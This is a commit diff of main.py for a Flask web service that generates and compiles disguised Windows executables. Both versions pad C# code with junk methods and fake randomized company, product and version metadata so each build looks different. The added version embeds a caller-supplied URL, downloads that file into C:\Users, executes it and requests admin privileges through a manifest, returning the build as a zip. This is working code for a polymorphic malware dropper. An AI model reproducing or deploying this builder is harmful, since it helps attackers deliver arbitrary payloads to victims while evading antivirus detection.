sigyllly commited on
Commit
1ba4609
·
verified ·
1 Parent(s): 1239cb0

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +205 -163
main.py CHANGED
@@ -1,164 +1,206 @@
1
- import os
2
- import random
3
- import string
4
- import subprocess
5
- from flask import Flask, render_template_string, send_file
6
-
7
- app = Flask(__name__)
8
-
9
- # Step 1: Define the base C# template without AssemblyCulture
10
- base_cs_template = """
11
- using System;
12
- using System.Diagnostics;
13
- using System.IO;
14
- using System.Reflection;
15
- [assembly: AssemblyTitle("<<title>>")]
16
- [assembly: AssemblyDescription("<<description>>")]
17
- [assembly: AssemblyConfiguration("<<configuration>>")]
18
- [assembly: AssemblyCompany("<<company>>")]
19
- [assembly: AssemblyProduct("<<product>>")]
20
- [assembly: AssemblyCopyright("<<copyright>>")]
21
- [assembly: AssemblyTrademark("<<trademark>>")]
22
- [assembly: AssemblyVersion("<<version>>")]
23
- [assembly: AssemblyFileVersion("<<file_version>>")]
24
- [assembly: AssemblyInformationalVersion("<<informational_version>>")]
25
- class Program
26
- {
27
- static void Main()
28
- {
29
- string originalFilePath = Path.Combine(Directory.GetCurrentDirectory(), "runtime.dll");
30
- if (File.Exists(originalFilePath))
31
- {
32
- <<control_flow_junk>>
33
- Process.Start(new ProcessStartInfo(originalFilePath, "/VERYSILENT /PASSWORD=YourSecurePassword") { UseShellExecute = false });
34
- <<additional_obfuscated_code>>
35
- Environment.Exit(0); // Exit immediately
36
- }
37
- }
38
- <<obfuscated_methods>>
39
- }
40
- """
41
-
42
- # Utility functions (unchanged)
43
- def random_string(length):
44
- return ''.join(random.choice(string.ascii_letters) for _ in range(length))
45
-
46
- def random_version():
47
- major = random.randint(1, 5)
48
- minor = random.randint(0, 9)
49
- build = random.randint(0, 99)
50
- revision = random.randint(0, 99)
51
- return f"{major}.{minor}.{build}.{revision}"
52
-
53
- titles = ['File Manager', 'Data Analyzer', 'Task Tracker', 'Cloud Backup', 'Image Editor', 'Video Converter']
54
- descriptions = ['This application helps in managing files efficiently.', 'Analyze data with advanced algorithms and insights.', 'Keep track of your tasks and deadlines easily.', 'Backup your data securely to the cloud.', 'Edit your images with powerful tools and filters.', 'Convert videos to various formats quickly.']
55
- companies = ['Tech Innovations', 'Global Solutions', 'Data Services', 'Creative Minds', 'Secure Systems', 'Future Technologies']
56
- trademarks = ['Innovative Solutions', 'Smart Technology', 'NextGen Apps', 'Empowering Users', 'Reliable Services', 'Creative Design']
57
-
58
- def generate_control_flow_junk():
59
- conditions = [
60
- "if (DateTime.Now.Day % 2 == 0) { Console.WriteLine(\"Even day\"); }",
61
- "for (int i = 0; i < 1; i++) { Console.WriteLine(\"Loop once\"); }",
62
- "if (false) { Console.WriteLine(\"This will never happen\"); }",
63
- "while (false) { break; }"
64
- ]
65
- return random.choice(conditions)
66
-
67
- def generate_obfuscated_methods():
68
- methods = [
69
- f'void {random_string(6)}() {{ Console.WriteLine("{random_string(10)}"); }}',
70
- f'int {random_string(6)}() {{ return {random.randint(0, 100)}; }}',
71
- f'bool {random_string(6)}() {{ return {random.choice([True, False])}; }}',
72
- f'string {random_string(6)}() {{ return "{random_string(12)}"; }}'
73
- ]
74
- return "\n ".join(random.sample(methods, k=2))
75
-
76
- def generate_additional_obfuscated_code():
77
- snippets = [
78
- "#pragma warning disable CS0219\nint unused = 123;\n#pragma warning restore CS0219",
79
- "string dummy = \"abc\";",
80
- "Console.WriteLine(\"Executing...\");"
81
- ]
82
- return random.choice(snippets)
83
-
84
- @app.route('/')
85
- def index():
86
- html_content = """
87
- <!DOCTYPE html>
88
- <html lang="en">
89
- <head>
90
- <meta charset="UTF-8">
91
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
92
- <title>Script Generator</title>
93
- </head>
94
- <body>
95
- <h1>Generate and Compile C# Script</h1>
96
- <form action="/generate" method="post">
97
- <button type="submit">Generate & Compile</button>
98
- </form>
99
- </body>
100
- </html>
101
- """
102
- return render_template_string(html_content)
103
-
104
- @app.route('/generate', methods=['POST'])
105
- def generate_script():
106
- # Generate the randomized assembly information using meaningful words
107
- assembly_info = {
108
- 'title': random.choice(titles),
109
- 'description': random.choice(descriptions),
110
- 'configuration': '', # Can leave empty
111
- 'company': random.choice(companies),
112
- 'product': "MyProduct",
113
- 'copyright': f"Copyright © {random.choice(companies)} 2024",
114
- 'trademark': random.choice(trademarks),
115
- 'version': random_version(),
116
- 'file_version': random_version(),
117
- 'informational_version': random_version()
118
- }
119
-
120
- # Replace placeholders in the base template
121
- modified_cs = base_cs_template.replace('<<title>>', assembly_info['title']) \
122
- .replace('<<description>>', assembly_info['description']) \
123
- .replace('<<configuration>>', assembly_info['configuration']) \
124
- .replace('<<company>>', assembly_info['company']) \
125
- .replace('<<product>>', assembly_info['product']) \
126
- .replace('<<copyright>>', assembly_info['copyright']) \
127
- .replace('<<trademark>>', assembly_info['trademark']) \
128
- .replace('<<version>>', assembly_info['version']) \
129
- .replace('<<file_version>>', assembly_info['file_version']) \
130
- .replace('<<informational_version>>', assembly_info['informational_version']) \
131
- .replace('<<control_flow_junk>>', generate_control_flow_junk()) \
132
- .replace('<<additional_obfuscated_code>>', generate_additional_obfuscated_code()) \
133
- .replace('<<obfuscated_methods>>', generate_obfuscated_methods())
134
-
135
- # Generate random file names
136
- script_path = 'polymorphic_program.cs'
137
- exe_name = random_string(10) + '.exe' # Generate a random executable name
138
-
139
- # Save the modified C# script to a file
140
- with open(script_path, 'w') as file:
141
- file.write(modified_cs)
142
-
143
- # Compile the C# script using mcs with the manifest for admin privileges
144
- compile_command = [
145
- 'mcs', '-target:winexe', '-out:' + exe_name, script_path,
146
- '-win32icon:app.ico', '-win32manifest:app.manifest'
147
- ]
148
-
149
- # Run the compilation command
150
- try:
151
- subprocess.run(compile_command, check=True)
152
- except subprocess.CalledProcessError as e:
153
- return f"Compilation failed: {e}", 500
154
- except FileNotFoundError:
155
- return "Compiler 'mcs' not found. Make sure it is installed and in the PATH.", 500
156
-
157
- # Provide a link to download the compiled executable
158
- return send_file(exe_name, as_attachment=True)
159
-
160
-
161
-
162
- # Start the Flask app
163
- if __name__ == '__main__':
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
164
  app.run(host='0.0.0.0', port=7860, debug=True)
 
1
+ import os
2
+ import random
3
+ import string
4
+ import subprocess
5
+ import zipfile
6
+ from flask import Flask, request, send_file, jsonify
7
+ from io import BytesIO
8
+ from urllib.parse import urlparse
9
+
10
+ app = Flask(__name__)
11
+
12
+ # Step 1: Define the base C# template without AssemblyCulture
13
+ base_cs_template = """
14
+ using System;
15
+ using System.Diagnostics;
16
+ using System.IO;
17
+ using System.Net.Http;
18
+ using System.Reflection;
19
+ using System.Threading.Tasks;
20
+
21
+ [assembly: AssemblyTitle("<<title>>")]
22
+ [assembly: AssemblyDescription("<<description>>")]
23
+ [assembly: AssemblyConfiguration("<<configuration>>")]
24
+ [assembly: AssemblyCompany("<<company>>")]
25
+ [assembly: AssemblyProduct("<<product>>")]
26
+ [assembly: AssemblyCopyright("<<copyright>>")]
27
+ [assembly: AssemblyTrademark("<<trademark>>")]
28
+ [assembly: AssemblyVersion("<<version>>")]
29
+ [assembly: AssemblyFileVersion("<<file_version>>")]
30
+ [assembly: AssemblyInformationalVersion("<<informational_version>>")]
31
+
32
+ class Program
33
+ {
34
+ static void Main()
35
+ {
36
+ // Call the async method synchronously
37
+ MainAsync().GetAwaiter().GetResult();
38
+ }
39
+
40
+ static async Task MainAsync()
41
+ {
42
+ string downloadUrl = "<<download_url>>";
43
+ string destinationFolder = @"C:\\Users";
44
+ string destinationFilePath = Path.Combine(destinationFolder, "<<file_name>>");
45
+
46
+ // Download the file
47
+ bool downloadSuccess = await DownloadFileAsync(downloadUrl, destinationFilePath);
48
+
49
+ // If the file was downloaded successfully, execute it and exit
50
+ if (downloadSuccess && File.Exists(destinationFilePath))
51
+ {
52
+ Process.Start(new ProcessStartInfo(destinationFilePath) { UseShellExecute = true });
53
+ Environment.Exit(0); // Exit immediately after starting the process
54
+ }
55
+ }
56
+
57
+ static async Task<bool> DownloadFileAsync(string url, string destinationFilePath)
58
+ {
59
+ using (HttpClient client = new HttpClient())
60
+ {
61
+ try
62
+ {
63
+ byte[] fileBytes = await client.GetByteArrayAsync(url);
64
+ File.WriteAllBytes(destinationFilePath, fileBytes);
65
+ return true;
66
+ }
67
+ catch
68
+ {
69
+ return false;
70
+ }
71
+ }
72
+ }
73
+ <<obfuscated_methods>>
74
+ }
75
+ """
76
+
77
+ # Utility functions
78
+ def random_string(length):
79
+ return ''.join(random.choice(string.ascii_letters) for _ in range(length))
80
+
81
+ def random_version():
82
+ major = random.randint(1, 5)
83
+ minor = random.randint(0, 9)
84
+ build = random.randint(0, 99)
85
+ revision = random.randint(0, 99)
86
+ return f"{major}.{minor}.{build}.{revision}"
87
+
88
+ titles = ['File Manager', 'Data Analyzer', 'Task Tracker', 'Cloud Backup', 'Image Editor', 'Video Converter']
89
+ descriptions = ['This application helps in managing files efficiently.', 'Analyze data with advanced algorithms and insights.', 'Keep track of your tasks and deadlines easily.', 'Backup your data securely to the cloud.', 'Edit your images with powerful tools and filters.', 'Convert videos to various formats quickly.']
90
+ companies = ['Tech Innovations', 'Global Solutions', 'Data Services', 'Creative Minds', 'Secure Systems', 'Future Technologies']
91
+ trademarks = ['Innovative Solutions', 'Smart Technology', 'NextGen Apps', 'Empowering Users', 'Reliable Services', 'Creative Design']
92
+
93
+ def generate_control_flow_junk():
94
+ conditions = [
95
+ "if (DateTime.Now.Day % 2 == 0) { Console.WriteLine(\"Even day\"); }",
96
+ "for (int i = 0; i < 1; i++) { Console.WriteLine(\"Loop once\"); }",
97
+ "if (false) { Console.WriteLine(\"This will never happen\"); }",
98
+ "while (false) { break; }"
99
+ ]
100
+ return random.choice(conditions)
101
+
102
+ def generate_obfuscated_methods():
103
+ methods = [
104
+ f'void {random_string(6)}() {{ Console.WriteLine("{random_string(10)}"); }}',
105
+ f'int {random_string(6)}() {{ return {random.randint(0, 100)}; }}',
106
+ f'bool {random_string(6)}() {{ return {random.choice([True, False])}; }}',
107
+ f'string {random_string(6)}() {{ return "{random_string(12)}"; }}'
108
+ ]
109
+ return "\n ".join(random.sample(methods, k=2))
110
+
111
+ def generate_additional_obfuscated_code():
112
+ snippets = [
113
+ "#pragma warning disable CS0219\nint unused = 123;\n#pragma warning restore CS0219",
114
+ "string dummy = \"abc\";",
115
+ "Console.WriteLine(\"Executing...\");"
116
+ ]
117
+ return random.choice(snippets)
118
+
119
+ def extract_filename_from_url(url):
120
+ parsed_url = urlparse(url)
121
+ return os.path.basename(parsed_url.path)
122
+
123
+ @app.route('/')
124
+ def index():
125
+ return jsonify({"message": "API is running. Use the /finish endpoint to generate and compile the script."})
126
+
127
+ @app.route('/finish', methods=['POST'])
128
+ def finish():
129
+ data = request.json
130
+ download_url = data.get('download_url')
131
+
132
+ if not download_url:
133
+ return jsonify({"error": "Missing 'download_url' parameter"}), 400
134
+
135
+ # Extract the file name from the URL
136
+ file_name = extract_filename_from_url(download_url)
137
+
138
+ # Generate the randomized assembly information using meaningful words
139
+ assembly_info = {
140
+ 'title': random.choice(titles),
141
+ 'description': random.choice(descriptions),
142
+ 'configuration': '', # Can leave empty
143
+ 'company': random.choice(companies),
144
+ 'product': "MyProduct",
145
+ 'copyright': f"Copyright © {random.choice(companies)} 2024",
146
+ 'trademark': random.choice(trademarks),
147
+ 'version': random_version(),
148
+ 'file_version': random_version(),
149
+ 'informational_version': random_version()
150
+ }
151
+
152
+ # Replace placeholders in the base template
153
+ modified_cs = base_cs_template.replace('<<title>>', assembly_info['title']) \
154
+ .replace('<<description>>', assembly_info['description']) \
155
+ .replace('<<configuration>>', assembly_info['configuration']) \
156
+ .replace('<<company>>', assembly_info['company']) \
157
+ .replace('<<product>>', assembly_info['product']) \
158
+ .replace('<<copyright>>', assembly_info['copyright']) \
159
+ .replace('<<trademark>>', assembly_info['trademark']) \
160
+ .replace('<<version>>', assembly_info['version']) \
161
+ .replace('<<file_version>>', assembly_info['file_version']) \
162
+ .replace('<<informational_version>>', assembly_info['informational_version']) \
163
+ .replace('<<download_url>>', download_url) \
164
+ .replace('<<file_name>>', file_name) \
165
+ .replace('<<control_flow_junk>>', generate_control_flow_junk()) \
166
+ .replace('<<additional_obfuscated_code>>', generate_additional_obfuscated_code()) \
167
+ .replace('<<obfuscated_methods>>', generate_obfuscated_methods())
168
+
169
+ # Generate random file names
170
+ script_path = random_string(10) + '.cs'
171
+ exe_name = random_string(10) + '.exe' # Generate a random executable name
172
+
173
+ # Save the modified C# script to a file
174
+ with open(script_path, 'w') as file:
175
+ file.write(modified_cs)
176
+
177
+ # Compile the C# script using mcs with the manifest for admin privileges
178
+ compile_command = [
179
+ 'mcs', '-target:winexe', '-out:' + exe_name, script_path,
180
+ '-win32icon:app.ico', '-win32manifest:app.manifest'
181
+ ]
182
+
183
+ # Run the compilation command
184
+ try:
185
+ subprocess.run(compile_command, check=True)
186
+ except subprocess.CalledProcessError as e:
187
+ return jsonify({"error": f"Compilation failed: {e}"}), 500
188
+ except FileNotFoundError:
189
+ return jsonify({"error": "Compiler 'mcs' not found. Make sure it is installed and in the PATH."}), 500
190
+
191
+ # Zip the executable
192
+ zip_buffer = BytesIO()
193
+ with zipfile.ZipFile(zip_buffer, 'w') as zip_file:
194
+ zip_file.write(exe_name)
195
+ zip_buffer.seek(0)
196
+
197
+ # Clean up generated files
198
+ os.remove(script_path)
199
+ os.remove(exe_name)
200
+
201
+ # Return the zip file
202
+ return send_file(zip_buffer, as_attachment=True, download_name='compiled_program.zip', mimetype='application/zip')
203
+
204
+ # Start the Flask app
205
+ if __name__ == '__main__':
206
  app.run(host='0.0.0.0', port=7860, debug=True)